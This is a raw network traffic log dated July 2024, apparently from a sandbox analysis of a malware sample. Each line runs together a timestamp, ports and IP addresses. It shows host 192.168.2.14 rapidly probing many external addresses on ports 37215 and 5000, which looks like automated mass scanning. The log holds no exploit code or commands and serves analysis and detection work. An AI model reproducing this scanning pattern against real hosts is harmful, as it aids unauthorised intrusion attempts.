                                                    Jul 10, 2024 08:26:11.654230118 CEST595405000192.168.2.14211.149.216.242
                                                    Jul 10, 2024 08:26:11.654230118 CEST368785000192.168.2.14211.208.35.179
                                                    Jul 10, 2024 08:26:11.654230118 CEST481805000192.168.2.14211.76.220.216
                                                    Jul 10, 2024 08:26:11.654230118 CEST429805000192.168.2.14211.113.128.138
                                                    Jul 10, 2024 08:26:11.654505014 CEST3721533588157.254.254.39192.168.2.14
                                                    Jul 10, 2024 08:26:11.654855013 CEST3721548786197.87.221.120192.168.2.14
                                                    Jul 10, 2024 08:26:11.654879093 CEST3721533170197.159.41.215192.168.2.14
                                                    Jul 10, 2024 08:26:11.654896021 CEST3721554718197.70.178.22192.168.2.14
                                                    Jul 10, 2024 08:26:11.655189037 CEST370545000192.168.2.14211.63.100.253
                                                    Jul 10, 2024 08:26:11.655189037 CEST423805000192.168.2.14211.243.154.203
                                                    Jul 10, 2024 08:26:11.655189037 CEST449185000192.168.2.14211.55.32.185
                                                    Jul 10, 2024 08:26:11.655189037 CEST420685000192.168.2.14211.71.149.3
                                                    Jul 10, 2024 08:26:11.655189037 CEST442825000192.168.2.14211.137.200.168
                                                    Jul 10, 2024 08:26:11.655189037 CEST437145000192.168.2.14211.252.231.154
                                                    Jul 10, 2024 08:26:11.655189037 CEST440285000192.168.2.14211.12.207.108
                                                    Jul 10, 2024 08:26:11.655189037 CEST403825000192.168.2.14211.202.247.124
                                                    Jul 10, 2024 08:26:11.655247927 CEST607685000192.168.2.14211.219.2.156
                                                    Jul 10, 2024 08:26:11.655247927 CEST335785000192.168.2.14211.26.137.212
                                                    Jul 10, 2024 08:26:11.655247927 CEST462105000192.168.2.14211.5.175.212
                                                    Jul 10, 2024 08:26:11.655247927 CEST427585000192.168.2.14211.205.65.39
                                                    Jul 10, 2024 08:26:11.655247927 CEST608965000192.168.2.14211.63.220.104
                                                    Jul 10, 2024 08:26:11.655247927 CEST558545000192.168.2.14211.90.129.39
                                                    Jul 10, 2024 08:26:11.655247927 CEST425625000192.168.2.14211.77.167.114
                                                    Jul 10, 2024 08:26:11.655247927 CEST511105000192.168.2.14211.218.23.159
                                                    Jul 10, 2024 08:26:11.655302048 CEST372153451641.70.197.249192.168.2.14
                                                    Jul 10, 2024 08:26:11.655999899 CEST605925000192.168.2.14211.76.74.243
                                                    Jul 10, 2024 08:26:11.655999899 CEST345185000192.168.2.14211.6.93.177
                                                    Jul 10, 2024 08:26:11.655999899 CEST563705000192.168.2.14211.232.114.43
                                                    Jul 10, 2024 08:26:11.655999899 CEST508385000192.168.2.14211.220.243.213
                                                    Jul 10, 2024 08:26:11.655999899 CEST578785000192.168.2.14211.134.138.101
                                                    Jul 10, 2024 08:26:11.655999899 CEST342925000192.168.2.14211.199.42.218
                                                    Jul 10, 2024 08:26:11.655999899 CEST461565000192.168.2.14211.67.249.254
                                                    Jul 10, 2024 08:26:11.655999899 CEST357145000192.168.2.14211.112.110.151
                                                    Jul 10, 2024 08:26:11.656219959 CEST500060278184.83.254.245192.168.2.14
                                                    Jul 10, 2024 08:26:11.656519890 CEST383225000192.168.2.14211.85.97.87
                                                    Jul 10, 2024 08:26:11.656519890 CEST589005000192.168.2.14211.173.173.6
                                                    Jul 10, 2024 08:26:11.656519890 CEST527025000192.168.2.14211.233.253.136
                                                    Jul 10, 2024 08:26:11.656519890 CEST572025000192.168.2.14211.241.193.147
                                                    Jul 10, 2024 08:26:11.656519890 CEST537305000192.168.2.14211.33.115.237
                                                    Jul 10, 2024 08:26:11.656519890 CEST435705000192.168.2.14211.43.129.133
                                                    Jul 10, 2024 08:26:11.656519890 CEST522965000192.168.2.14211.76.152.29
                                                    Jul 10, 2024 08:26:11.656519890 CEST566645000192.168.2.14211.24.40.236
                                                    Jul 10, 2024 08:26:11.656528950 CEST500040178184.17.125.233192.168.2.14
                                                    Jul 10, 2024 08:26:11.656590939 CEST487005000192.168.2.14211.41.148.119
                                                    Jul 10, 2024 08:26:11.656590939 CEST356605000192.168.2.14211.87.194.245
                                                    Jul 10, 2024 08:26:11.656590939 CEST355045000192.168.2.14211.39.49.194
                                                    Jul 10, 2024 08:26:11.656590939 CEST575165000192.168.2.14211.234.224.27
                                                    Jul 10, 2024 08:26:11.656590939 CEST534565000192.168.2.14211.56.67.12
                                                    Jul 10, 2024 08:26:11.656590939 CEST571845000192.168.2.14211.229.37.154
                                                    Jul 10, 2024 08:26:11.656590939 CEST434365000192.168.2.14211.59.203.172
                                                    Jul 10, 2024 08:26:11.656740904 CEST500048468184.162.78.242192.168.2.14
                                                    Jul 10, 2024 08:26:11.656753063 CEST500041900184.68.222.242192.168.2.14
                                                    Jul 10, 2024 08:26:11.656949043 CEST500036294184.87.188.175192.168.2.14
                                                    Jul 10, 2024 08:26:11.657305956 CEST500058470184.178.186.75192.168.2.14
                                                    Jul 10, 2024 08:26:11.657315969 CEST500043462184.0.252.205192.168.2.14
                                                    Jul 10, 2024 08:26:11.657449007 CEST500041450184.147.188.6192.168.2.14
                                                    Jul 10, 2024 08:26:11.657629013 CEST500057206184.217.99.85192.168.2.14
                                                    Jul 10, 2024 08:26:11.657674074 CEST5046037215192.168.2.1425.174.195.250
                                                    Jul 10, 2024 08:26:11.657674074 CEST5950837215192.168.2.14157.253.160.119
                                                    Jul 10, 2024 08:26:11.657674074 CEST5950837215192.168.2.14157.253.160.119
                                                    Jul 10, 2024 08:26:11.657674074 CEST5950837215192.168.2.14157.253.160.119
                                                    Jul 10, 2024 08:26:11.657674074 CEST5690437215192.168.2.1441.228.20.71
                                                    Jul 10, 2024 08:26:11.657753944 CEST500037446184.160.169.144192.168.2.14
                                                    Jul 10, 2024 08:26:11.657886028 CEST400625000192.168.2.14211.230.81.151
                                                    Jul 10, 2024 08:26:11.657886028 CEST528685000192.168.2.14211.32.114.170
                                                    Jul 10, 2024 08:26:11.657886028 CEST355585000192.168.2.14211.202.216.143
                                                    Jul 10, 2024 08:26:11.657886028 CEST452265000192.168.2.14211.187.47.169
                                                    Jul 10, 2024 08:26:11.657886028 CEST378265000192.168.2.14211.153.150.94
                                                    Jul 10, 2024 08:26:11.657886028 CEST522305000192.168.2.14211.15.34.140
                                                    Jul 10, 2024 08:26:11.657886028 CEST373345000192.168.2.14211.202.85.48
                                                    Jul 10, 2024 08:26:11.657886028 CEST442625000192.168.2.14211.220.110.70
                                                    Jul 10, 2024 08:26:11.658082008 CEST500045502184.222.131.61192.168.2.14
                                                    Jul 10, 2024 08:26:11.658092022 CEST500039498184.28.229.147192.168.2.14
                                                    Jul 10, 2024 08:26:11.658193111 CEST500043172184.97.194.26192.168.2.14
                                                    Jul 10, 2024 08:26:11.658201933 CEST536885000192.168.2.14211.81.214.211
                                                    Jul 10, 2024 08:26:11.658201933 CEST523385000192.168.2.14211.229.165.137
                                                    Jul 10, 2024 08:26:11.658201933 CEST5211237215192.168.2.14157.11.188.194
                                                    Jul 10, 2024 08:26:11.658201933 CEST5211237215192.168.2.14157.11.188.194
                                                    Jul 10, 2024 08:26:11.658201933 CEST5211237215192.168.2.14157.11.188.194
                                                    Jul 10, 2024 08:26:11.658282995 CEST500035982184.123.51.19192.168.2.14
                                                    Jul 10, 2024 08:26:11.658502102 CEST500045324184.0.62.54192.168.2.14
                                                    Jul 10, 2024 08:26:11.658662081 CEST500036026184.76.141.89192.168.2.14
                                                    Jul 10, 2024 08:26:11.658895969 CEST4152037215192.168.2.14157.147.144.222
                                                    Jul 10, 2024 08:26:11.658895969 CEST3435837215192.168.2.14197.189.249.195
                                                    Jul 10, 2024 08:26:11.658895969 CEST3435837215192.168.2.14197.189.249.195
                                                    Jul 10, 2024 08:26:11.658895969 CEST3435837215192.168.2.14197.189.249.195
                                                    Jul 10, 2024 08:26:11.658895969 CEST4826037215192.168.2.1459.245.135.106
                                                    Jul 10, 2024 08:26:11.658895969 CEST3713237215192.168.2.14197.246.39.163
                                                    Jul 10, 2024 08:26:11.658895969 CEST3713237215192.168.2.14197.246.39.163
                                                    Jul 10, 2024 08:26:11.658895969 CEST3713237215192.168.2.14197.246.39.163
                                                    Jul 10, 2024 08:26:11.658916950 CEST500039558184.239.93.42192.168.2.14
                                                    Jul 10, 2024 08:26:11.659102917 CEST500047416184.158.81.150192.168.2.14
                                                    Jul 10, 2024 08:26:11.659112930 CEST500039458184.54.207.119192.168.2.14
                                                    Jul 10, 2024 08:26:11.659163952 CEST500054880184.72.193.234192.168.2.14
                                                    Jul 10, 2024 08:26:11.659327984 CEST500044744184.219.133.105192.168.2.14
                                                    Jul 10, 2024 08:26:11.659337997 CEST500051344184.157.88.71192.168.2.14
                                                    Jul 10, 2024 08:26:11.659395933 CEST3425837215192.168.2.14157.174.22.12
                                                    Jul 10, 2024 08:26:11.659395933 CEST3425837215192.168.2.14157.174.22.12
                                                    Jul 10, 2024 08:26:11.659395933 CEST3425837215192.168.2.14157.174.22.12
                                                    Jul 10, 2024 08:26:11.659395933 CEST3516837215192.168.2.14197.108.193.202
                                                    Jul 10, 2024 08:26:11.659395933 CEST3516837215192.168.2.14197.108.193.202
                                                    Jul 10, 2024 08:26:11.659395933 CEST3516837215192.168.2.14197.108.193.202
                                                    Jul 10, 2024 08:26:11.659395933 CEST4379437215192.168.2.1441.197.240.187
                                                    Jul 10, 2024 08:26:11.659395933 CEST4379437215192.168.2.1441.197.240.187
                                                    Jul 10, 2024 08:26:11.659471989 CEST414685000192.168.2.14211.35.251.215
                                                    Jul 10, 2024 08:26:11.659471989 CEST3727037215192.168.2.14157.13.78.138
                                                    Jul 10, 2024 08:26:11.659472942 CEST3727037215192.168.2.14157.13.78.138
                                                    Jul 10, 2024 08:26:11.659472942 CEST3727037215192.168.2.14157.13.78.138
                                                    Jul 10, 2024 08:26:11.659472942 CEST5800237215192.168.2.14157.25.128.159
                                                    Jul 10, 2024 08:26:11.659472942 CEST5800237215192.168.2.14157.25.128.159
                                                    Jul 10, 2024 08:26:11.659472942 CEST5800237215192.168.2.14157.25.128.159
                                                    Jul 10, 2024 08:26:11.659472942 CEST3359037215192.168.2.1441.170.52.142
                                                    Jul 10, 2024 08:26:11.659486055 CEST500035320184.53.243.23192.168.2.14
                                                    Jul 10, 2024 08:26:11.659663916 CEST500040720184.44.183.138192.168.2.14
                                                    Jul 10, 2024 08:26:11.659887075 CEST500034472184.23.251.218192.168.2.14
                                                    Jul 10, 2024 08:26:11.659898043 CEST500057312184.60.60.176192.168.2.14
                                                    Jul 10, 2024 08:26:11.660126925 CEST500039672184.209.128.45192.168.2.14
                                                    Jul 10, 2024 08:26:11.660309076 CEST500057776184.27.11.237192.168.2.14
                                                    Jul 10, 2024 08:26:11.660417080 CEST500053830184.244.228.81192.168.2.14
                                                    Jul 10, 2024 08:26:11.660577059 CEST500041250184.49.50.102192.168.2.14
                                                    Jul 10, 2024 08:26:11.660748959 CEST500049352184.6.49.132192.168.2.14
                                                    Jul 10, 2024 08:26:11.660926104 CEST500034050184.48.109.104192.168.2.14
                                                    Jul 10, 2024 08:26:11.660969019 CEST3472837215192.168.2.1441.144.102.136
                                                    Jul 10, 2024 08:26:11.660969019 CEST3908237215192.168.2.14157.53.146.11
                                                    Jul 10, 2024 08:26:11.661025047 CEST500047102184.207.213.163192.168.2.14
                                                    Jul 10, 2024 08:26:11.661382914 CEST4379437215192.168.2.1441.197.240.187
                                                    Jul 10, 2024 08:26:11.661382914 CEST4370637215192.168.2.142.247.127.226
                                                    Jul 10, 2024 08:26:11.661382914 CEST5627637215192.168.2.14197.239.231.22
                                                    Jul 10, 2024 08:26:11.661382914 CEST5627637215192.168.2.14197.239.231.22
                                                    Jul 10, 2024 08:26:11.661382914 CEST5627637215192.168.2.14197.239.231.22
                                                    Jul 10, 2024 08:26:11.661382914 CEST6066237215192.168.2.1441.9.90.125
                                                    Jul 10, 2024 08:26:11.661382914 CEST6066237215192.168.2.1441.9.90.125
                                                    Jul 10, 2024 08:26:11.661763906 CEST3359037215192.168.2.1441.170.52.142
                                                    Jul 10, 2024 08:26:11.661763906 CEST3359037215192.168.2.1441.170.52.142
                                                    Jul 10, 2024 08:26:11.661763906 CEST4342237215192.168.2.1441.233.2.240
                                                    Jul 10, 2024 08:26:11.661763906 CEST4342237215192.168.2.1441.233.2.240
                                                    Jul 10, 2024 08:26:11.661763906 CEST4342237215192.168.2.1441.233.2.240
                                                    Jul 10, 2024 08:26:11.661763906 CEST5103037215192.168.2.14157.50.253.146
                                                    Jul 10, 2024 08:26:11.661763906 CEST5103037215192.168.2.14157.50.253.146
                                                    Jul 10, 2024 08:26:11.661763906 CEST5103037215192.168.2.14157.50.253.146
                                                    Jul 10, 2024 08:26:11.662723064 CEST6066237215192.168.2.1441.9.90.125
                                                    Jul 10, 2024 08:26:11.662723064 CEST5685037215192.168.2.1441.109.187.107
                                                    Jul 10, 2024 08:26:11.662723064 CEST5314437215192.168.2.14157.107.162.53
                                                    Jul 10, 2024 08:26:11.662723064 CEST6018837215192.168.2.1489.24.181.240
                                                    Jul 10, 2024 08:26:11.662723064 CEST3315437215192.168.2.14113.146.63.134
                                                    Jul 10, 2024 08:26:11.662956953 CEST372155046025.174.195.250192.168.2.14
                                                    Jul 10, 2024 08:26:11.663115978 CEST3721559508157.253.160.119192.168.2.14
                                                    Jul 10, 2024 08:26:11.663156033 CEST3714637215192.168.2.14197.172.12.130
                                                    Jul 10, 2024 08:26:11.663156033 CEST3714637215192.168.2.14197.172.12.130
                                                    Jul 10, 2024 08:26:11.663156033 CEST3714637215192.168.2.14197.172.12.130
                                                    Jul 10, 2024 08:26:11.663156986 CEST4892037215192.168.2.1441.100.48.34
                                                    Jul 10, 2024 08:26:11.663156986 CEST4892037215192.168.2.1441.100.48.34
                                                    Jul 10, 2024 08:26:11.663156986 CEST4892037215192.168.2.1441.100.48.34
                                                    Jul 10, 2024 08:26:11.663218021 CEST3721559508157.253.160.119192.168.2.14
                                                    Jul 10, 2024 08:26:11.663284063 CEST3721559508157.253.160.119192.168.2.14
                                                    Jul 10, 2024 08:26:11.663686991 CEST372155690441.228.20.71192.168.2.14
                                                    Jul 10, 2024 08:26:11.663765907 CEST344725000192.168.2.14184.23.251.218
                                                    Jul 10, 2024 08:26:11.663765907 CEST513445000192.168.2.14184.157.88.71
                                                    Jul 10, 2024 08:26:11.663765907 CEST394585000192.168.2.14184.54.207.119
                                                    Jul 10, 2024 08:26:11.663765907 CEST453245000192.168.2.14184.0.62.54
                                                    Jul 10, 2024 08:26:11.663765907 CEST395585000192.168.2.14184.239.93.42
                                                    Jul 10, 2024 08:26:11.663767099 CEST431725000192.168.2.14184.97.194.26
                                                    Jul 10, 2024 08:26:11.663767099 CEST455025000192.168.2.14184.222.131.61
                                                    Jul 10, 2024 08:26:11.664007902 CEST3721552112157.11.188.194192.168.2.14
                                                    Jul 10, 2024 08:26:11.664016962 CEST3721541520157.147.144.222192.168.2.14
                                                    Jul 10, 2024 08:26:11.664026022 CEST3721552112157.11.188.194192.168.2.14
                                                    Jul 10, 2024 08:26:11.664197922 CEST3721552112157.11.188.194192.168.2.14
                                                    Jul 10, 2024 08:26:11.664596081 CEST584705000192.168.2.14184.178.186.75
                                                    Jul 10, 2024 08:26:11.664596081 CEST419005000192.168.2.14184.68.222.242
                                                    Jul 10, 2024 08:26:11.664596081 CEST401785000192.168.2.14184.17.125.233
                                                    Jul 10, 2024 08:26:11.664596081 CEST5950837215192.168.2.14157.253.160.119
                                                    Jul 10, 2024 08:26:11.664608955 CEST3721534358197.189.249.195192.168.2.14
                                                    Jul 10, 2024 08:26:11.664680004 CEST5542237215192.168.2.1441.9.0.7
                                                    Jul 10, 2024 08:26:11.664680004 CEST5542237215192.168.2.1441.9.0.7
                                                    Jul 10, 2024 08:26:11.664680004 CEST5542237215192.168.2.1441.9.0.7
                                                    Jul 10, 2024 08:26:11.664680004 CEST5463837215192.168.2.1441.181.29.82
                                                    Jul 10, 2024 08:26:11.664680004 CEST5463837215192.168.2.1441.181.29.82
                                                    Jul 10, 2024 08:26:11.664680004 CEST5463837215192.168.2.1441.181.29.82
                                                    Jul 10, 2024 08:26:11.664680004 CEST3640837215192.168.2.14157.107.27.74
                                                    Jul 10, 2024 08:26:11.664680004 CEST3640837215192.168.2.14157.107.27.74
                                                    Jul 10, 2024 08:26:11.664756060 CEST3721534258157.174.22.12192.168.2.14
                                                    Jul 10, 2024 08:26:11.664764881 CEST3721534258157.174.22.12192.168.2.14
                                                    Jul 10, 2024 08:26:11.664773941 CEST3721534358197.189.249.195192.168.2.14
                                                    Jul 10, 2024 08:26:11.664818048 CEST3721534258157.174.22.12192.168.2.14
                                                    Jul 10, 2024 08:26:11.665016890 CEST3721534358197.189.249.195192.168.2.14
                                                    Jul 10, 2024 08:26:11.665121078 CEST3721537270157.13.78.138192.168.2.14
                                                    Jul 10, 2024 08:26:11.665193081 CEST372154826059.245.135.106192.168.2.14
                                                    Jul 10, 2024 08:26:11.665203094 CEST3721535168197.108.193.202192.168.2.14
                                                    Jul 10, 2024 08:26:11.665292025 CEST3435837215192.168.2.14197.189.249.195
                                                    Jul 10, 2024 08:26:11.665345907 CEST3721535168197.108.193.202192.168.2.14
                                                    Jul 10, 2024 08:26:11.665544033 CEST3721537270157.13.78.138192.168.2.14
                                                    Jul 10, 2024 08:26:11.665555000 CEST3721535168197.108.193.202192.168.2.14
                                                    Jul 10, 2024 08:26:11.665569067 CEST3721537132197.246.39.163192.168.2.14
                                                    Jul 10, 2024 08:26:11.665749073 CEST3640837215192.168.2.14157.107.27.74
                                                    Jul 10, 2024 08:26:11.665749073 CEST3696437215192.168.2.14197.230.47.191
                                                    Jul 10, 2024 08:26:11.665749073 CEST5153637215192.168.2.1441.211.128.190
                                                    Jul 10, 2024 08:26:11.665749073 CEST5257037215192.168.2.1441.159.106.191
                                                    Jul 10, 2024 08:26:11.665749073 CEST5930837215192.168.2.1441.207.94.39
                                                    Jul 10, 2024 08:26:11.665790081 CEST3721537132197.246.39.163192.168.2.14
                                                    Jul 10, 2024 08:26:11.665863991 CEST3721537132197.246.39.163192.168.2.14
                                                    Jul 10, 2024 08:26:11.665872097 CEST602785000192.168.2.14184.83.254.245
                                                    Jul 10, 2024 08:26:11.665873051 CEST3721537270157.13.78.138192.168.2.14
                                                    Jul 10, 2024 08:26:11.665872097 CEST573125000192.168.2.14184.60.60.176
                                                    Jul 10, 2024 08:26:11.665872097 CEST407205000192.168.2.14184.44.183.138
                                                    Jul 10, 2024 08:26:11.665872097 CEST548805000192.168.2.14184.72.193.234
                                                    Jul 10, 2024 08:26:11.665872097 CEST572065000192.168.2.14184.217.99.85
                                                    Jul 10, 2024 08:26:11.665872097 CEST434625000192.168.2.14184.0.252.205
                                                    Jul 10, 2024 08:26:11.665884018 CEST372154379441.197.240.187192.168.2.14
                                                    Jul 10, 2024 08:26:11.666074991 CEST372153472841.144.102.136192.168.2.14
                                                    Jul 10, 2024 08:26:11.666171074 CEST372154379441.197.240.187192.168.2.14
                                                    Jul 10, 2024 08:26:11.666181087 CEST3721558002157.25.128.159192.168.2.14
                                                    Jul 10, 2024 08:26:11.666487932 CEST3721558002157.25.128.159192.168.2.14
                                                    Jul 10, 2024 08:26:11.666496992 CEST3721539082157.53.146.11192.168.2.14
                                                    Jul 10, 2024 08:26:11.666507959 CEST3721558002157.25.128.159192.168.2.14
                                                    Jul 10, 2024 08:26:11.666526079 CEST372154379441.197.240.187192.168.2.14
                                                    Jul 10, 2024 08:26:11.666753054 CEST37215437062.247.127.226192.168.2.14
                                                    Jul 10, 2024 08:26:11.666764021 CEST372153359041.170.52.142192.168.2.14
                                                    Jul 10, 2024 08:26:11.666770935 CEST5567637215192.168.2.14157.247.11.168
                                                    Jul 10, 2024 08:26:11.666882992 CEST484685000192.168.2.14184.162.78.242
                                                    Jul 10, 2024 08:26:11.666882992 CEST362945000192.168.2.14184.87.188.175
                                                    Jul 10, 2024 08:26:11.666882992 CEST5211237215192.168.2.14157.11.188.194
                                                    Jul 10, 2024 08:26:11.666882992 CEST577765000192.168.2.14184.27.11.237
                                                    Jul 10, 2024 08:26:11.666883945 CEST3425837215192.168.2.14157.174.22.12
                                                    Jul 10, 2024 08:26:11.666924953 CEST372153359041.170.52.142192.168.2.14
                                                    Jul 10, 2024 08:26:11.666966915 CEST3721556276197.239.231.22192.168.2.14
                                                    Jul 10, 2024 08:26:11.667113066 CEST372153359041.170.52.142192.168.2.14
                                                    Jul 10, 2024 08:26:11.667123079 CEST3721556276197.239.231.22192.168.2.14
                                                    Jul 10, 2024 08:26:11.667208910 CEST372154342241.233.2.240192.168.2.14
                                                    Jul 10, 2024 08:26:11.667311907 CEST4379437215192.168.2.1441.197.240.187
                                                    Jul 10, 2024 08:26:11.667409897 CEST5627637215192.168.2.14197.239.231.22
                                                    Jul 10, 2024 08:26:11.667601109 CEST3721556276197.239.231.22192.168.2.14
                                                    Jul 10, 2024 08:26:11.667609930 CEST372154342241.233.2.240192.168.2.14
                                                    Jul 10, 2024 08:26:11.667618990 CEST372154342241.233.2.240192.168.2.14
                                                    Jul 10, 2024 08:26:11.667681932 CEST372156066241.9.90.125192.168.2.14
                                                    Jul 10, 2024 08:26:11.667692900 CEST372156066241.9.90.125192.168.2.14
                                                    Jul 10, 2024 08:26:11.667701006 CEST372156066241.9.90.125192.168.2.14
                                                    Jul 10, 2024 08:26:11.667898893 CEST3721551030157.50.253.146192.168.2.14
                                                    Jul 10, 2024 08:26:11.667995930 CEST372155685041.109.187.107192.168.2.14
                                                    Jul 10, 2024 08:26:11.668005943 CEST3721551030157.50.253.146192.168.2.14
                                                    Jul 10, 2024 08:26:11.668145895 CEST3721553144157.107.162.53192.168.2.14
                                                    Jul 10, 2024 08:26:11.668287992 CEST3721537146197.172.12.130192.168.2.14
                                                    Jul 10, 2024 08:26:11.668298960 CEST372156018889.24.181.240192.168.2.14
                                                    Jul 10, 2024 08:26:11.668649912 CEST3721537146197.172.12.130192.168.2.14
                                                    Jul 10, 2024 08:26:11.668664932 CEST3721533154113.146.63.134192.168.2.14
                                                    Jul 10, 2024 08:26:11.668674946 CEST3721537146197.172.12.130192.168.2.14
                                                    Jul 10, 2024 08:26:11.669173002 CEST353205000192.168.2.14184.53.243.23
                                                    Jul 10, 2024 08:26:11.669173002 CEST447445000192.168.2.14184.219.133.105
                                                    Jul 10, 2024 08:26:11.669173002 CEST360265000192.168.2.14184.76.141.89
                                                    Jul 10, 2024 08:26:11.669173002 CEST474165000192.168.2.14184.158.81.150
                                                    Jul 10, 2024 08:26:11.669173002 CEST359825000192.168.2.14184.123.51.19
                                                    Jul 10, 2024 08:26:11.669173956 CEST394985000192.168.2.14184.28.229.147
                                                    Jul 10, 2024 08:26:11.669173956 CEST414505000192.168.2.14184.147.188.6
                                                    Jul 10, 2024 08:26:11.669482946 CEST372154892041.100.48.34192.168.2.14
                                                    Jul 10, 2024 08:26:11.669492960 CEST372154892041.100.48.34192.168.2.14
                                                    Jul 10, 2024 08:26:11.669678926 CEST372154892041.100.48.34192.168.2.14
                                                    Jul 10, 2024 08:26:11.669684887 CEST374465000192.168.2.14184.160.169.144
                                                    Jul 10, 2024 08:26:11.669684887 CEST340505000192.168.2.14184.48.109.104
                                                    Jul 10, 2024 08:26:11.669684887 CEST471025000192.168.2.14184.207.213.163
                                                    Jul 10, 2024 08:26:11.669684887 CEST493525000192.168.2.14184.6.49.132
                                                    Jul 10, 2024 08:26:11.669686079 CEST538305000192.168.2.14184.244.228.81
                                                    Jul 10, 2024 08:26:11.669686079 CEST396725000192.168.2.14184.209.128.45
                                                    Jul 10, 2024 08:26:11.669686079 CEST412505000192.168.2.14184.49.50.102
                                                    Jul 10, 2024 08:26:11.669686079 CEST3727037215192.168.2.14157.13.78.138
                                                    Jul 10, 2024 08:26:11.669899940 CEST372155542241.9.0.7192.168.2.14
                                                    Jul 10, 2024 08:26:11.670104980 CEST3721559508157.253.160.119192.168.2.14
                                                    Jul 10, 2024 08:26:11.670152903 CEST5800237215192.168.2.14157.25.128.159
                                                    Jul 10, 2024 08:26:11.670152903 CEST3359037215192.168.2.1441.170.52.142
                                                    Jul 10, 2024 08:26:11.670152903 CEST4342237215192.168.2.1441.233.2.240
                                                    Jul 10, 2024 08:26:11.670152903 CEST3714637215192.168.2.14197.172.12.130
                                                    Jul 10, 2024 08:26:11.670152903 CEST4892037215192.168.2.1441.100.48.34
                                                    Jul 10, 2024 08:26:11.670258045 CEST372155463841.181.29.82192.168.2.14
                                                    Jul 10, 2024 08:26:11.670322895 CEST3721534358197.189.249.195192.168.2.14
                                                    Jul 10, 2024 08:26:11.670464039 CEST372155463841.181.29.82192.168.2.14
                                                    Jul 10, 2024 08:26:11.670553923 CEST5463837215192.168.2.1441.181.29.82
                                                    Jul 10, 2024 08:26:11.670679092 CEST372155463841.181.29.82192.168.2.14
                                                    Jul 10, 2024 08:26:11.670689106 CEST3721536408157.107.27.74192.168.2.14
                                                    Jul 10, 2024 08:26:11.670756102 CEST3721536408157.107.27.74192.168.2.14
                                                    Jul 10, 2024 08:26:11.671058893 CEST3721536408157.107.27.74192.168.2.14
                                                    Jul 10, 2024 08:26:11.671147108 CEST3721536964197.230.47.191192.168.2.14
                                                    Jul 10, 2024 08:26:11.671330929 CEST372155153641.211.128.190192.168.2.14
                                                    Jul 10, 2024 08:26:11.671458960 CEST372155257041.159.106.191192.168.2.14
                                                    Jul 10, 2024 08:26:11.671468973 CEST372155930841.207.94.39192.168.2.14
                                                    Jul 10, 2024 08:26:11.671952009 CEST3721552112157.11.188.194192.168.2.14
                                                    Jul 10, 2024 08:26:11.672182083 CEST3721555676157.247.11.168192.168.2.14
                                                    Jul 10, 2024 08:26:11.672202110 CEST3721534258157.174.22.12192.168.2.14
                                                    Jul 10, 2024 08:26:11.672250032 CEST372154379441.197.240.187192.168.2.14
                                                    Jul 10, 2024 08:26:11.672306061 CEST3721556276197.239.231.22192.168.2.14
                                                    Jul 10, 2024 08:26:11.675014973 CEST3721537270157.13.78.138192.168.2.14
                                                    Jul 10, 2024 08:26:11.675025940 CEST3721558002157.25.128.159192.168.2.14
                                                    Jul 10, 2024 08:26:11.675035000 CEST372153359041.170.52.142192.168.2.14
                                                    Jul 10, 2024 08:26:11.675647974 CEST372154342241.233.2.240192.168.2.14
                                                    Jul 10, 2024 08:26:11.675699949 CEST3721537146197.172.12.130192.168.2.14
                                                    Jul 10, 2024 08:26:11.675712109 CEST372154892041.100.48.34192.168.2.14
                                                    Jul 10, 2024 08:26:11.676400900 CEST372155463841.181.29.82192.168.2.14
                                                    Jul 10, 2024 08:26:11.716001987 CEST372155542241.9.0.7192.168.2.14
                                                    Jul 10, 2024 08:26:11.793526888 CEST328265000192.168.2.14184.239.14.77
                                                    Jul 10, 2024 08:26:11.793533087 CEST483385000192.168.2.14184.69.248.106
                                                    Jul 10, 2024 08:26:11.793534040 CEST481265000192.168.2.14184.163.171.101
                                                    Jul 10, 2024 08:26:11.793550968 CEST577765000192.168.2.14184.27.11.237
                                                    Jul 10, 2024 08:26:11.793550968 CEST573125000192.168.2.14184.60.60.176
                                                    Jul 10, 2024 08:26:11.793553114 CEST471025000192.168.2.14184.207.213.163
                                                    Jul 10, 2024 08:26:11.793581009 CEST480425000192.168.2.14184.159.26.123
                                                    Jul 10, 2024 08:26:11.793605089 CEST344725000192.168.2.14184.23.251.218
                                                    Jul 10, 2024 08:26:11.793605089 CEST513445000192.168.2.14184.157.88.71
                                                    Jul 10, 2024 08:26:11.793672085 CEST561525000192.168.2.14184.188.249.125
                                                    Jul 10, 2024 08:26:11.793669939 CEST479285000192.168.2.14184.35.31.78
                                                    Jul 10, 2024 08:26:11.793672085 CEST552025000192.168.2.14184.44.135.20
                                                    Jul 10, 2024 08:26:11.793672085 CEST429645000192.168.2.14184.163.112.62
                                                    Jul 10, 2024 08:26:11.793669939 CEST385985000192.168.2.14184.231.50.255
                                                    Jul 10, 2024 08:26:11.793670893 CEST578265000192.168.2.14184.83.14.18
                                                    Jul 10, 2024 08:26:11.793670893 CEST464645000192.168.2.14184.230.32.114
                                                    Jul 10, 2024 08:26:11.793670893 CEST459685000192.168.2.14184.146.101.192
                                                    Jul 10, 2024 08:26:11.793860912 CEST571945000192.168.2.14184.225.166.232
                                                    Jul 10, 2024 08:26:11.793860912 CEST467765000192.168.2.14184.115.114.30
                                                    Jul 10, 2024 08:26:11.793860912 CEST595445000192.168.2.14184.58.118.88
                                                    Jul 10, 2024 08:26:11.793860912 CEST419165000192.168.2.14184.36.124.90
                                                    Jul 10, 2024 08:26:11.793860912 CEST473345000192.168.2.14184.170.42.167
                                                    Jul 10, 2024 08:26:11.793860912 CEST330405000192.168.2.14184.41.235.112
                                                    Jul 10, 2024 08:26:11.793860912 CEST565165000192.168.2.14184.98.146.18
                                                    Jul 10, 2024 08:26:11.793860912 CEST546445000192.168.2.14184.61.245.237
                                                    Jul 10, 2024 08:26:11.795547962 CEST394585000192.168.2.14184.54.207.119
                                                    Jul 10, 2024 08:26:11.795547962 CEST395585000192.168.2.14184.239.93.42
                                                    Jul 10, 2024 08:26:11.795547962 CEST431725000192.168.2.14184.97.194.26
                                                    Jul 10, 2024 08:26:11.795547962 CEST453245000192.168.2.14184.0.62.54
                                                    Jul 10, 2024 08:26:11.795547962 CEST455025000192.168.2.14184.222.131.61
                                                    Jul 10, 2024 08:26:11.795547962 CEST584705000192.168.2.14184.178.186.75
                                                    Jul 10, 2024 08:26:11.795548916 CEST419005000192.168.2.14184.68.222.242
                                                    Jul 10, 2024 08:26:11.795548916 CEST401785000192.168.2.14184.17.125.233
                                                    Jul 10, 2024 08:26:11.795736074 CEST606985000192.168.2.14184.213.180.26
                                                    Jul 10, 2024 08:26:11.795736074 CEST351845000192.168.2.14184.113.206.110
